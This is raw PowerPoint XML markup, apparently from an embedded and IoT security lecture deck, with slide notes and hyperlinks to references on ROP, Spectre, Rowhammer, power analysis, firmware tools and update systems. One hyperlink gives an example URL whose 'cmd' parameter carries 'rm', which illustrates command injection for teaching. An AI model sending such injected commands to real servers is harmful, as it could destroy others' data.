        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24726787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EF99AB4-05FC-447E-B721-3794F0492178}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143363" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="419100" y="693738"/>
            <a:ext cx="6173788" cy="3473450"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143364" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="935038" y="4398963"/>
            <a:ext cx="5140325" cy="4164012"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln w="9525"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="sv-SE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19167943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83</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6173717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84</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836665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88</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595702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89</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1964201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90</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413556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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36129912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93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27772604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95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11019887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96</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23736623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97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="131018892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98</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33653519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99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29480185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100</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17575610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101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42553962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102</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20617019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103</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102159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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40759976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104</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11320460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105</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38025406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106</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="425471536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107</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11600944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108</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15048697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110</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19850427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111</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34532660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112</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21553938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113</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="983680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114</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28396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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29129115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115</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9274796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116</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="829619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117</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10712058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118</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23172304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119</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="273906598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120</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30303554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121</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10754280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122</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15993597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409575" y="696913"/>
            <a:ext cx="6194425" cy="3484562"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41987" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NX wasted effort?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="286065221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125</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2238426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
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="2024244"/>
            <a:ext cx="9144000" cy="1577794"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4000" b="0" i="0">
                <a:latin typeface="Helvetica Light" charset="0"/>
                <a:ea typeface="Helvetica Light" charset="0"/>
                <a:cs typeface="Helvetica Light" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CLICK TO EDIT MASTER TITLE STYLE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168814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93266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55760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93D0-4E2F-9649-A94A-AD3ADEBF5464}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406401" y="381000"/>
            <a:ext cx="10759017"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98D01-C3CB-6D47-BA56-1ADFA73C41B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1219200"/>
            <a:ext cx="553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1BDAD6-ECC5-4D41-BEEB-BB0CEB209005}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6350000" y="1219200"/>
            <a:ext cx="553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D93141C-09FD-D447-BB86-D05A4EE5E7D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10668000" y="6324600"/>
            <a:ext cx="1219200" cy="381000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{E8DF9DB3-DA2E-C04F-B371-82CA98044841}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="100597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D7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="5883687" cy="2001147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4000" b="0" i="0">
                <a:latin typeface="Helvetica Light" charset="0"/>
                <a:ea typeface="Helvetica Light" charset="0"/>
                <a:cs typeface="Helvetica Light" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CLICK TO EDIT MASTER TITLE STYLE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="827631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4ED37D-937C-2643-892B-5B4434EB85A7}"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697061" cy="1325563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3200" b="0" i="0">
                <a:latin typeface="Helvetica Light" charset="0"/>
                <a:ea typeface="Helvetica Light" charset="0"/>
                <a:cs typeface="Helvetica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
        <p:nvSpPr>
          <p:cNvPr id="7" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3602038"/>
            <a:ext cx="22522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902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a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr sz="6000" b="0" i="0">
                <a:latin typeface="Helvetica Light" charset="0"/>
                <a:ea typeface="Helvetica Light" charset="0"/>
                <a:cs typeface="Helvetica Light" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="4400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Helvetica Light" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rP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63404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63555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3766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4" name="Slide Number Placeholder 3"/>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7527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7" name="Slide Number Placeholder 6"/>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97925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7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11355388" y="6356350"/>
            <a:ext cx="360058" cy="365125"/>
          </a:xfrm>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9364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555818" y="6356350"/>
            <a:ext cx="360058" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{28D3D4DC-4C1F-3443-AE22-9AE9141051EF}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15939429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717" r:id="rId12"/>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Helvetica Light"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Helvetica Light"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Helvetica Light"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Helvetica Light"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4ED37D-937C-2643-892B-5B4434EB85A7}"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7241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notesSlide" Target="../notesSlides/notesSlide80.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/" TargetMode="Externa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www.qemu.org/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sbabic/swupdate" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.yoctoproject.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clearlinux/swupd-server" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/clearlinux/swupd-client" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mendersoftware/mender" TargetMode="Externa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JonathanSalwan/ROPgadget" TargetMode="External"/><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hyperlink" Target="https://hovav.net/ucsd/talks/blackhat08.html" TargetMode="External"/><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hyperlink" Target="http://example.com/path/to/page?name=john&amp;title=ceo" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide116.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/path/to/page?cmd=rm&amp;arg=" TargetMode="Externa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hyperlink" Target="https://lamport.azurewebsites.net/tla/tools.html?unhideBut=hide-tlc&amp;unhideDiv=tlc" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide126.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.csail.mit.edu/person/adam-chlipala" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/research/project/zing/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blast.lbl.gov/" TargetMode="Externa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hyperlink" Target="https://dl.acm.org/citation.cfm?id=858704" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide132.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.flashmemorysummit.com/English/Collaterals/Proceedings/2017/20170808_FT11_Mattoon.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hyperlink" Target="http://www.cs.technion.ac.il/~yanivca/BugAttacks.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide134.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://web.mit.edu/6.857/OldStuff/Fall03/ref/kocher-DPATechInfo.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.paulkocher.com/doc/DifferentialPowerAnalysis.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://spectreattack.com/spectre.pdf" TargetMode="Externa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hyperlink" Target="https://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html" TargetMode="External"/><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hyperlink" Target="https://buitlroot.org/downloads/buildroot-xxx" TargetMode="External"/><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hyperlink" Target="https://github.com/ReFirmLabs/binwalk" TargetMode="External"/><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hyperlink" Target="https://www.raspberrypi.org/downloads" TargetMode="External"/><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hyperlink" Target="https://eur02.safelinks.protection.outlook.com/?url=https%3A%2F%2Fwww.matrix.one%2Fproducts%2Fcreator&amp;data=02%7C01%7C%7Cfc47ce3dbeba4920448508d6c8ebc4f3%7C84df9e7fe9f640afb435aaaaaaaaaaaa%7C1%7C0%7C636917312272569386&amp;sdata=lzHqVO%2BcP2rYJLu8DUMk7Bm%2BhSzUYtp2wgdfD05t8Is%3D&amp;reserved=0" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide152.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://aws.amazon.com/iot/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://azure.microsoft.com/en-us/overview/io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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/research/wpcontent/uploads/2017/03/SevenPropertiesofHighlySecureDevices.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide155.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/u-boot/u-boot" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Das_U-Boot" TargetMode="Externa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157.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" 